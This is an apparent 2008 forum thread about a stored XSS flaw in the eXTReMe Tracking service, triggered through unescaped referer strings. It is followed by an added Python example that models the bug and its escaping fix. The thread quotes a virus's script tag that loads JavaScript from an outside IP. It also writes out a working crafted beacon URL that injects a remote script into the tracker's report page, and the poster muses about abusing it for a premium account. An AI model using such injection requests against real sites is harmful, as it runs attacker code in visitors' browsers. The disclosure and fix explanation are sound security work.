quangntenemy
I use this one to track visitors coming to my blog. Recently there has been an evil Chinese virus roaming around freely, and I have been blogging about it. And many people have been coming to my blog via the Google query: <script src=http://121.15.220.104/1.js></script> which is the signature for the virus. Guess what? Today when I visited eXTReMe Tracking, I saw this nice ad: http://www.flickr.com/photos/22823442@N02/2195246062/ What happened? No, neither my comp nor any other computer around was pwned by the virus. It was the tracker site that got pwned. For some weird reason it HTML-decoded the referer string, and as a result the malicious script was inserted into the page. Now let's see if I can "forge" the referer to insert my own script into the page.
15.01.2008 13:59:36
|
alt3rn4tiv3
Haha. The ad reads "好消息", aka "good news". P.S. The forum is not Asian-language compatible.
Edited by alt3rn4tiv3 on 15.01.2008 14:15:20
15.01.2008 14:14:43
|
quangntenemy
I finally managed to reproduce the XSS in a "nice" way. First you need to request the page:
http://e1.extreme-dm.com/s10.g?login=qpenguin&jv=y&j=y&srw=1024&srb=24&l=http%3A//www.google.com/search%3Fhl%3Den%26q%3D%3Cscript+src%3Dhttp%3A//quangntenemy.t35.com/lolxss.js%3E%3C/script%3E%26btnG%3DGoogle+Search
Then wait a few minutes and you'll see the XSS here:
http://extremetracking.com/open;ref1?login=qpenguin
Screenshot: http://www.flickr.com/photos/22823442@N02/2194552167/
Now maybe I can use this to get a premium account. This type 2 XSS attack is surely the most dangerous one.
Edited by quangntenemy on 18.01.2008 06:57:43
15.01.2008 14:57:43

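The mechanism the post above describes, as an added example that is not code from this thread or from eXTReMe Tracking: a small Python model of a tracker that takes the referring page from the beacon's `l` query parameter, stores it, and later renders it into the referrer report either unescaped (the behaviour the post reports) or HTML-escaped at output time (the fix). The beacon URL is the one quoted in the post; the two render functions, the `<td><a>` layout they emit and the `contains_live_script` check are assumptions made for this demo, not the tracker's real code.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed sample: the tracker beacon request quoted in the post above.
# The referring page travels in the "l" parameter, URL-encoded once.
BEACON_REQUEST = (
    "http://e1.extreme-dm.com/s10.g?login=qpenguin&jv=y&j=y&srw=1024&srb=24"
    "&l=http%3A//www.google.com/search%3Fhl%3Den%26q%3D%3Cscript+src%3D"
    "http%3A//quangntenemy.t35.com/lolxss.js%3E%3C/script%3E%26btnG%3DGoogle+Search"
)


def referer_from_beacon(beacon_url):
    """Recover the referring page the way a tracker would store it: one round of
    URL-decoding of the 'l' parameter (parse_qs performs that round, including
    '+' -> space). The decoded value already contains a literal <script> tag."""
    params = parse_qs(urlsplit(beacon_url).query)
    return params["l"][0]


def render_referer_vulnerable(referer):
    """Hypothetical model of the buggy report page (assumption, not the real
    tracker): the stored referer is entity-decoded, as the post describes, and
    dropped straight into the HTML. Any tag inside the referer becomes live."""
    decoded = html.unescape(referer)
    return '<td><a href="%s">%s</a></td>' % (decoded, decoded)


def render_referer_fixed(referer):
    """Hardened form (added here): the stored value is HTML-escaped at output
    time, so '<', '>', '&' and quotes reach the browser as inert entities."""
    safe = html.escape(referer, quote=True)
    return '<td><a href="%s">%s</a></td>' % (safe, safe)


def contains_live_script(fragment):
    """Demo check: does the fragment contain an actual <script tag, as opposed
    to the escaped text '&lt;script' that a browser would merely display?"""
    return "<script" in fragment.lower()


if __name__ == "__main__":
    referer = referer_from_beacon(BEACON_REQUEST)
    print("stored referer:", referer)
    for name, render in (("vulnerable", render_referer_vulnerable),
                         ("fixed", render_referer_fixed)):
        out = render(referer)
        print("%-10s live script: %s" % (name, contains_live_script(out)))
        print("  ", out)
```

The point the check makes is that the fix belongs at the output boundary: whatever decoding the tracker does on the way in (URL-decoding, entity-decoding), the referer is attacker-controlled text and must be escaped for the HTML context it is written into, otherwise every visitor of the report page runs the referer's script.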
unknown user
Yup, that's pretty bad.
15.01.2008 15:41:10
